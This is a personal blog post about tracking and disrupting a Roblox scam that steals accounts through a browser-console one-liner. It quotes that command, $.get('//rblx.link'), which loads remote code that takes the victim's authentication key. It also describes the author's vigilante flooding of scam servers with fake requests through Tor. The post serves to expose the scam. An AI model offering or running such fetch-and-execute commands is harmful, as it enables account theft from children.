Daniel's Stuff

 RSS

Dismantling a Roblox Scam

September 21, 2020

James 3:16: For where jealousy and selfish ambition exist, there will be disorder and every vile practice.
On January 28th, 2020, I decided to visit Roblox to check up on things a bit. I am almost never active there, and only log in every month or so. I noticed that I was sent a message by a Roblox friend, asking me a harmless question.

hi dude i'm making a game and I wanna put your roblox character into it could you upload your roblox char texture as a decal and send the link to me here's a tutorial on how to do it if you don't already know:

They linked me to a Youtube tutorial, and I was instantly suspicious of a scam. On the Youtube video, I was prompted to run this javascript in my browser:

$.get('//rblx.link')

"rblx.link" runs remote code from a third party website. That code gets your Roblox authentication key and sends it to their server, and then sends you to the profile texture as expected. When I clicked on my friends profile, they were wearing red and blue Roblox clothes, and the description was changed to:

Ask your parents to vote for Trump this year! #MAGA2020

They had messed with the wrong person, and were going to pay.

I spent a few days studying the the fraud, and came up with a clear and explanation of the process:

It mainly started with a data breach, in which the scammer took advantage of and infected. When an account is hacked, their Robux is stolen, and account is filled with Trump propaganda. They the system messages all their friends, sending the same message, therefore, the number of hacked accounts grows exponentially.

I tracked the fraud site's hosting provider to DigitalOcean, so I reported it and they quickly removed it, effectively shutting it down.

That lasted 5 hours.

After their host was down, they quickly relocated to a lesser-known Netherlands based host and changed the description of the video to a new port on the same domain. I then returned by reporting the abusive website to the new host. They didn't respond.

In an effort to try and slow down the efficiency of the system, I wrote a script to generate fake requests and send them to the server. This will confuse the real and fake requests, therefore drastically slowing down the breaking-into-accounts process. I proceeded to send hundreds, and sometimes thousands of fake requests over a period of a few days. Although this was very effective, some websites only allowed 1 visit per IP address. I could just renew Tor sessions, but it wasn't nearly as effective.

Who's Affected?

While this was running, I started to do some research on other people’s experiences with the scam.

After searching more, I figured out it wasn't just one site, but many, although the Trump propaganda accounts seem to be the most popular. Simply looking though Youtube shows that many people have been setting up servers to steal accounts in the exact same way the Trump one was. There are even tutorials on Youtube showing you how to set it up, and showing behind the scenes on how it works.

I went through as many scam sites as I could. One even send the executable JavaScript encoded in JSFuck.

I modified my script to be interchangeable between as many fraud sites as I could find, and started spamming again. At the time, this was very secret. I didn't want anybody to be able to find the weaknesses of all the scams.

A Conclusion

"Robux" is the problem with Roblox. More specifically, getting children to join a community based on a digital currency is a bad idea. Sure, it brings people together, you can make friends. The idea sounds fun in theory, but is unavoidably very problematic in practice. What is even more of a bad idea is having the ability to exchange Robux for real life currency. This is what lets adults be able to take advantage of the platform.

Kids want free Robux. They will do anything and everything to obtain it. The people on the other end, do everything they possibly can to make their "Robux generators" look legit. This includes things like adding fake chat rooms, fake recent activity, and even hosting PDF files on local government websites.

And it works.

I’m not trying to blame scams entirely on Roblox’s design. Simply put, when you add digital currency into a game, it becomes more about the currency and not the game itself.

Contacting Roblox

As my motivation to kill off Roblox scams dies off, I decided to send some emails to the Roblox team. Their replies seemed to be written very quickly, and more importantly, it doesn't look like they passed it to the Roblox security team.

Here is one of the emails I sent them:

As the scam takes over many accounts, banning each one will not be effective, especially since they were hacked into in the first place.

I meant not a popup message on the main page, but a message to their inbox, the same place where you get messages on the latest "Wonder Woman Items". It would greatly increase awareness about the current situation, and help the Roblox community to continue to be a safe place.

Also, it is strange that Youtube links are able to be sent and can pass through your messaging system, assuming it was not already fixed.

And they responded:

Hello Dan,

Thank you for your reply.

Although we may not be able to follow-up further, we do value and use player ideas and suggestions to bring new features and awareness to Roblox.

We would also like to inform you that once you use the 'Report Abuse' option a ticket is generated and may take a few minutes to reach one of our live moderation agents. ROBLOX moderators are a team of employees who work diligently around the clock to review and apply appropriate consequences when necessary.

Please note that just because you have reported someone does not mean our team will immediately remove the player from the website for days at a time. We have a procedure that we follow for every user on the website and for every situation. You may not know what type and length of moderation another user's account will receive, as it is private but all accounts caught violating ROBLOX rules will be moderated.

The important part here to understand is that privacy rules do not permit us to share moderation actions taken against other accounts, but all accounts caught violating ROBLOX rules will be moderated.

Therefore, you will never know if the action was actually taken, rest assured, we always take action according to the nature of the violation.

If you need help with something else, please let us know here.

Sincerely, Simon

The response was most likely generated. Although in the first email, one line seemed to be unique. We appreciate you taking the time to write in with your feedback for Roblox and want to confirm that your suggestion regarding the issuing a warning message to the users regarding this propaganda has been received. This means they are completely fine with sending messages encouraging children to purchase Robux, but they can’t send a warning about a fraud destroying their community?

I guess we'll never know...

Further reading: https://www.androidauthority.com/in-app-purchases-good-bad-ugly-truth-324604/
Back

Contact me: